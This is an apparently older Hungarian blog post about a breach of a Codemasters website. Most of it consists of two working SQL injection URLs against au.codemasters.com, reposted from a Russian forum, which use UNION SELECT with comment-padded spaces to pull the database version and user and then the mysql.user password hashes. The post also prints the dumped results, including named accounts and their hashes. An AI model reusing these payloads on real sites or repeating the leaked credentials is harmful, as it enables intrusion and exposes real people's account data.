Most a CodeMasters valamelyik site-ját lékelte meg egy Kon fedőnevű humanoid életforma. Eddig a CM részéről nem lett megerősítve, a THN-re beküldött infók alapján felhasználónevek, email címek, és DES-sel hashelt jelszavak kerültek ki. Ebből nem sok minden derül ki, mysql injekt, codemasters.com.
Viszont egy orosz fórumon találtam más codemasterses failt is:
http://au.codemasters.com/news/?showart icle=1465476598762103/**/union/**/select/**/concat_ws(0x3a,version(),user(),database())/*
Database Version: 4.1.20-log Database name: codem User name: codiesforum@l360a.codemasters.com.dock
http://au.codemasters.com/news/?showarticle=1465476598762103/**/UNION/**/SELECT/**/CONCAT(0x3a,(SELECT/**/CONCAT(password,0x3a,user)/**/FROM/**/mysql.user/**/LIMIT/**/1,1),0x3a)/*
::root :: :: :5283f24030a7f0a4: codiesforum :5283f24030a7f0a4: codiesforum :5283f24030a7f0a4: codiesforum :5283f24030a7f0a4: codiesforum :5283f24030a7f0a4: codiesforum :5283f24030a7f0a4: codiesforum :28882517462b220b: replisync :593da7b347470371: alex.speed :4442781618168588: lee.ward
Úgy látszik hogy most a játékmogulok csesztetése a haxordivat... ^__^
A bejegyzés trackback címe:
Kommentek:
A hozzászólások a vonatkozó jogszabályok értelmében felhasználói tartalomnak minősülnek, értük a szolgáltatás technikai üzemeltetője semmilyen felelősséget nem vállal, azokat nem ellenőrzi. Kifogás esetén forduljon a blog szerkesztőjéhez. Részletek a Felhasználási feltételekben és az adatvédelmi tájékoztatóban.